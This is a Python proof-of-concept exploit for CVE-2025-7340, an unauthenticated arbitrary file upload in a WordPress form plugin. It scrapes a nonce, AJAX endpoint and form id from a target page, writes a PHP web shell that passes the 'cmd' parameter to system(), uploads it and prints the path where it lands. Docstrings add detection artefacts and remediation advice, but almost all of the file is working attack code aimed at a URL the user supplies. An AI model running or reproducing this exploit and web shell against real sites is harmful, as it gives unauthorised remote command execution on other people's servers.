import re
import requests
import argparse
import time
from colorama import init, Fore, Style
# By : Nxploited (Khaled_alenazi)
# colorama: with autoreset=True the colour/style codes are reset after every print call.
init(autoreset=True)
class Nxploited:
    """Proof-of-concept client for CVE-2025-7340 (unauthenticated arbitrary file upload).

    Flow, as implemented below:
      1. GET the target page without authenticating.
      2. Scrape a nonce, the AJAX endpoint URL and a form id out of the HTML.
      3. Write a PHP file to the current working directory.
      4. POST that file to the AJAX endpoint as multipart form data.

    Artefacts a defender can look for, all taken from this code:
      * multipart POSTs to the site's AJAX endpoint carrying
        ``action=ht_form_temp_file_upload`` and an ``ht_form_file`` part whose
        filename ends in ``.php`` or whose type is ``application/x-php``;
      * new files below ``wp-content/uploads/ht_form/temp/``;
      * the fixed User-Agent string set in ``__init__``.

    Remediation: update the affected plugin to a release that fixes
    CVE-2025-7340; as defence in depth, configure the web server not to
    execute PHP under the uploads directory.
    """

    def __init__(self, target_url):
        """Store the target URL (trailing slashes removed) and build the HTTP session."""
        self.target_url = target_url.rstrip("/")

        http = requests.Session()
        # TLS certificate verification is turned off for every request on this
        # session, and the resulting urllib3 warnings are silenced.
        http.verify = False
        requests.packages.urllib3.disable_warnings()
        http.headers.update({
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome Safari"
        })
        self.session = http

        # Filled in by extract_parameters().
        self.nonce = None
        self.ajax_url = None
        self.form_id = None

    def run(self):
        """Execute the four stages in order; any stage may raise."""
        print(Fore.CYAN + "Starting exploit against target...")
        time.sleep(1)
        stages = (
            self.fetch_target_page,
            self.extract_parameters,
            self.generate_shell,
            self.upload_shell,
        )
        for stage in stages:
            stage()

    def fetch_target_page(self):
        """Download the target page and keep its body in ``self.page_content``.

        Raises:
            Exception: if the response status is anything other than 200.
        """
        print(Fore.YELLOW + "Fetching target page...")
        page = self.session.get(self.target_url)
        if page.status_code == 200:
            self.page_content = page.text
            return
        raise Exception("Failed to fetch target page")

    def extract_parameters(self):
        """Scrape nonce, AJAX URL and form id from the fetched page and print them.

        The nonce is read from a page fetched without logging in, so in this
        flow it does not act as an authentication check.

        Raises:
            Exception: if any of the three values could not be found.
        """
        print(Fore.YELLOW + "Extracting parameters...")
        time.sleep(0.8)

        self.nonce = self.extract_nonce()
        self.ajax_url = self.extract_ajax_url()
        self.form_id = self.extract_form_id()

        report = (
            ("Extracted Nonce", self.nonce),
            ("AJAX Endpoint", self.ajax_url),
            ("Form ID", self.form_id),
        )
        for position, (label, value) in enumerate(report):
            if position:
                # Short pause between lines, none before the first one.
                time.sleep(0.3)
            self.print_info(label, value, Fore.GREEN)

        if not (self.nonce and self.ajax_url and self.form_id):
            raise Exception("Missing required parameters")

    def extract_nonce(self):
        """Return the lowercase-hex value of a ``"nonce":"..."`` pair in the page, or None."""
        found = re.search(r'"nonce":"([a-f0-9]+)"', self.page_content)
        if found is None:
            return None
        return found.group(1)

    def extract_ajax_url(self):
        """Return the ``"ajaxurl"`` value from the page with ``\\/`` unescaped, or None."""
        found = re.search(r'"ajaxurl":"(http[^"]+)"', self.page_content)
        if found is None:
            return None
        escaped_url = found.group(1)
        return escaped_url.replace("\\/", "/")

    def extract_form_id(self):
        """Return the digits of the first ``data-form-id`` attribute on a ``<form>`` tag, or None."""
        found = re.search(r'<form[^>]+data-form-id=["\']?(\d+)', self.page_content)
        if found is None:
            return None
        return found.group(1)

    def generate_shell(self):
        """Write the PHP payload to ``shell.php`` in the current working directory.

        The payload echoes a fixed marker string and passes the ``cmd`` query
        parameter to PHP's ``system()``. The marker and the ``system($_GET[...])``
        call are simple content signatures when scanning an uploads directory.
        """
        print(Fore.YELLOW + "Generating webshell...")
        payload = """<?php
echo "Nxploited<br>";
if(isset($_GET['cmd'])) {
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
}
?>"""
        with open("shell.php", "w") as handle:
            handle.write(payload)

    def upload_shell(self):
        """POST ``shell.php`` to the AJAX endpoint and report the outcome.

        On a JSON reply with a truthy ``success`` field the relative path built
        from ``data.file_id`` is printed; the script never requests that path
        itself, so the printed result is not verified here.
        """
        print(Fore.YELLOW + "Uploading shell, please wait...")
        time.sleep(1)

        # NOTE(review): the handle opened for the file part is never closed
        # explicitly. A non-JSON reply makes .json() raise to the caller.
        multipart_fields = {
            "action": (None, "ht_form_temp_file_upload"),
            "_wpnonce": (None, self.nonce),
            "form_id": (None, self.form_id),
            "ht_form_file": ("shell.php", open("shell.php", "rb"), "application/x-php")
        }
        reply = self.session.post(self.ajax_url, files=multipart_fields)
        outcome = reply.json()

        if not outcome.get("success"):
            print(Fore.RED + "Upload failed or unexpected response")
            return

        file_id = outcome["data"].get("file_id", "")
        shell_path = f"wp-content/uploads/ht_form/temp/{file_id}"
        print(Fore.GREEN + Style.BRIGHT + "\n[+] Exploit Successfully!\n")
        Nxploited.print_info("Go to", shell_path, Fore.MAGENTA + Style.BRIGHT)
        print(Fore.CYAN + "\nExploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited\n")

    @staticmethod
    def print_info(label, value, color=Fore.WHITE):
        """Print ``label: value`` prefixed with the given colorama colour code."""
        print("{}{}: {}".format(color, label, value))
def main():
    """Parse the required ``-u/--url`` option and run the proof of concept once.

    Any exception raised while running is caught and printed in red instead
    of producing a traceback; constructing the client happens outside that
    guard.
    """
    cli = argparse.ArgumentParser(
        description="Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)"
    )
    cli.add_argument(
        "-u",
        "--url",
        required=True,
        help="Target URL e.g http(s)://target.com",
    )
    options = cli.parse_args()

    client = Nxploited(options.url)
    try:
        client.run()
    except Exception as e:
        print(Fore.RED + f"Error: {e}")
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()